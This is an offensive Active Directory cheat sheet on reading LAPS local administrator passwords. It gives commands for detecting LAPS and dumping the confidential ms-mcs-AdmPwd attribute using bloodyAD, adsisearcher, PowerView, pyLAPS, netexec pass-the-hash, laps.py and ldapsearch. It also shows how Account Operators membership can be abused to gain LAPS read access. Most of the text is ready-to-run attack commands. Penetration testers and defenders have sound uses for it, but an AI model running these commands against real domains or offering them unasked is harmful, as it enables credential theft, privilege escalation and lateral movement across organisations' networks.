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Password - LAPS
Reading LAPS Password
Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.
Determine if LAPS is installed
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
Extract LAPS password
The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users
bloodyAD -u john.doe -d bloody.lab -p Password512 --host get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
From Windows:
adsisearcher (native binary on Windows 8+)
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties}
PS > Import-Module .\PowerView.ps1 PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
$ Get-LAPSComputers ComputerName Password Expiration ------------ -------- ---------- example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 $ Find-LAPSDelegatedGroups $ Find-AdmPwdExtendedRights
Powershell AdmPwd.PS
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
From Linux:
pyLAPS to read and write LAPS passwords:
# Read the password of all computers ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip # Write a random password to a specific computer ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip
netexec smb -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
python laps.py -u 'user' -p 'password' -d 'domain.local' python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local'
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
Grant LAPS Access
The members of the group "Account Operator" can add and modify all the non admin users and groups. Since LAPS ADM and LAPS READ are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"